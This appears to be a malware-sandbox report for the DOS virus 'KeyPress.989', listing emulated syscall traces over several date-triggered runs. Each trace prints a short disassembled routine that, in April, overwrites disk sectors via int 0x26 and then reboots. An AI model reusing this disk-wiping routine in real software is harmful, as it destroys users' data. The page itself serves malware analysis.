Sample viewer

vx.netlux.org/Virus.DOS.KeyPress.989

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:33.653524466Z 42 PC: 12eda | Get date 0x12eda: cmp dh, 4
0x12edd: jne 0x12eff
0x12edf: xor dx, dx
0x12ee1: mov ah, 0x19
0x12ee3: int 0x21
0x12ee5: xor bx, bx
0x12ee7: mov ds, bx
0x12ee9: mov cx, 0x77
0x12eec: int 0x26
0x12eee: jb 0x12efa
0x12ef0: pop di
0x12ef1: add dx, 0x78
0x12ef4: cmp dx, 0x2d0
0x12ef8: jne 0x12ee9
0x12efa: ljmp 0xf000:0xfff0
0x12eff: nop
0x12f00: call 0x12f4f
0x12f03: jb 0x12f36
0x12f05: push es
0x12f06: pop ds
2018-12-17T22:26:33.656277055Z 48 PC: 12f22 | Get DOS version
2018-12-17T22:26:33.657520099Z 64 PC: 12b17 | Write file or device (Write 44 bytes on handle 1)
2018-12-17T22:26:33.661909474Z 64 PC: 12b24 | Write file or device (Write 20 bytes on handle 1)
2018-12-17T22:26:33.666571094Z 64 PC: 12b43 | Write file or device (Write 23 bytes on handle 1)
2018-12-17T22:26:33.674256263Z 76 PC: 12b4a | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4710,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:06:53.413825661Z 42 PC: 12eda | Get date 0x12eda: cmp dh, 4
0x12edd: jne 0x12eff
0x12edf: xor dx, dx
0x12ee1: mov ah, 0x19
0x12ee3: int 0x21
0x12ee5: xor bx, bx
0x12ee7: mov ds, bx
0x12ee9: mov cx, 0x77
0x12eec: int 0x26
0x12eee: jb 0x12efa
0x12ef0: pop di
0x12ef1: add dx, 0x78
0x12ef4: cmp dx, 0x2d0
0x12ef8: jne 0x12ee9
0x12efa: ljmp 0xf000:0xfff0
0x12eff: nop
0x12f00: call 0x12f4f
0x12f03: jb 0x12f36
0x12f05: push es
0x12f06: pop ds
2018-12-25T13:06:53.416711833Z 48 PC: 12f22 | Get DOS version
2018-12-25T13:06:53.418292476Z 64 PC: 12b17 | Write file or device (Write 44 bytes on handle 1)
2018-12-25T13:06:53.42935079Z 64 PC: 12b24 | Write file or device (Write 20 bytes on handle 1)
2018-12-25T13:06:53.435696234Z 64 PC: 12b43 | Write file or device (Write 23 bytes on handle 1)
2018-12-25T13:06:53.450366555Z 76 PC: 12b4a | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4710,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.62098124Z 42 PC: 12eda | Get date 0x12eda: cmp dh, 4
0x12edd: jne 0x12eff
0x12edf: xor dx, dx
0x12ee1: mov ah, 0x19
0x12ee3: int 0x21
0x12ee5: xor bx, bx
0x12ee7: mov ds, bx
0x12ee9: mov cx, 0x77
0x12eec: int 0x26
0x12eee: jb 0x12efa
0x12ef0: pop di
0x12ef1: add dx, 0x78
0x12ef4: cmp dx, 0x2d0
0x12ef8: jne 0x12ee9
0x12efa: ljmp 0xf000:0xfff0
0x12eff: nop
0x12f00: call 0x12f4f
0x12f03: jb 0x12f36
0x12f05: push es
0x12f06: pop ds
2018-12-25T11:52:40.623802939Z 25 PC: 12ee5 | Get default drive
2018-12-25T11:52:42.939154563Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:52:42.941351079Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:52:42.944567371Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:52:42.947701006Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:52:42.958265195Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:52:42.961081251Z 62 PC: 91fc1 | Close file
2018-12-25T11:52:42.963633487Z 75 PC: 91fe0 | Execute program
2018-12-25T11:52:42.9792472Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:52:42.981258697Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:52:42.985755399Z 48 PC: c609 | Get DOS version
2018-12-25T11:52:42.989182709Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:52:42.992325597Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:52:42.995116575Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:52:42.99878403Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:52:43.003587387Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:52:43.010200403Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:52:43.020335551Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:52:43.021599953Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:52:43.024573928Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:52:43.044183915Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:52:43.047908053Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:52:43.050133232Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:52:43.05143459Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:52:43.052576098Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:52:43.05464288Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:52:43.056143109Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:52:43.065026554Z 62 PC: 8f8eb | Close file
2018-12-25T11:52:43.067956201Z 62 PC: 8f8f2 | Close file
2018-12-25T11:52:43.070066846Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.072661001Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.075354588Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.07737427Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.079156084Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.081865043Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.083924711Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.085686699Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.08764655Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.09040709Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.092148966Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.093892337Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.09607038Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.098308336Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.100071834Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.102410468Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.104077918Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.105755248Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.107953397Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.109389979Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.110867569Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.113101599Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.11455237Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.115974716Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.119287684Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.12089548Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.122548808Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.124487884Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.126124052Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:52:43.127758649Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:52:43.134329308Z 62 PC: 8f90e | Close file
2018-12-25T11:52:43.135934367Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:52:43.138945604Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:52:43.141811783Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:52:43.14659048Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:52:43.147843627Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:52:43.153295185Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:52:43.155436675Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:52:43.157001012Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:52:43.160074195Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:52:43.162190296Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:52:43.163810245Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:52:43.166639855Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:52:43.168468347Z 73 PC: 8fa11 | Release memory
2018-12-25T11:52:43.170152789Z 73 PC: 8efea | Release memory
2018-12-25T11:52:43.171851859Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:52:43.174390825Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:52:43.176215118Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:52:43.177900582Z 73 PC: 8f060 | Release memory
2018-12-25T11:52:43.179789258Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:52:43.189199593Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:52:43.194849573Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:52:43.197537751Z 62 PC: 8f0d1 | Close file
2018-12-25T11:52:43.199868533Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:52:43.219831528Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:52:43.22162936Z 48 PC: 12bee | Get DOS version
2018-12-25T11:52:43.223308412Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:52:43.225829823Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:52:43.228145636Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:52:43.229610066Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:52:43.231960696Z 72 PC: 1355d | Allocate memory
2018-12-25T11:52:43.234407979Z 25 PC: 13596 | Get default drive
2018-12-25T11:52:43.235747898Z 71 PC: 135ad | Get current directory
2018-12-25T11:52:43.238255292Z 59 PC: 135ba | Change current directory
2018-12-25T11:52:43.244305023Z 59 PC: 135c8 | Change current directory
2018-12-25T11:52:43.249962749Z 59 PC: 135d3 | Change current directory
2018-12-25T11:52:43.253573143Z 25 PC: 12d13 | Get default drive
2018-12-25T11:52:43.255347431Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:52:43.256321427Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:52:43.257485367Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:52:43.260210769Z 80 PC: 1301d | Set current PSP
2018-12-25T11:52:43.261157851Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:52:43.262374927Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:52:43.264268035Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:52:43.267253303Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:52:43.269244117Z 72 PC: 130ec | Allocate memory
2018-12-25T11:52:43.271760152Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:52:43.278036323Z 62 PC: 131ba | Close file
2018-12-25T11:52:43.279973951Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:52:43.281417701Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:52:43.282724552Z 72 PC: 11991 | Allocate memory
2018-12-25T11:52:43.284149107Z 73 PC: 119b2 | Release memory
2018-12-25T11:52:43.285943646Z 72 PC: 119bd | Allocate memory
2018-12-25T11:52:43.287549857Z 73 PC: 119df | Release memory
2018-12-25T11:52:43.288888877Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:52:43.29068087Z 72 PC: 119fd | Allocate memory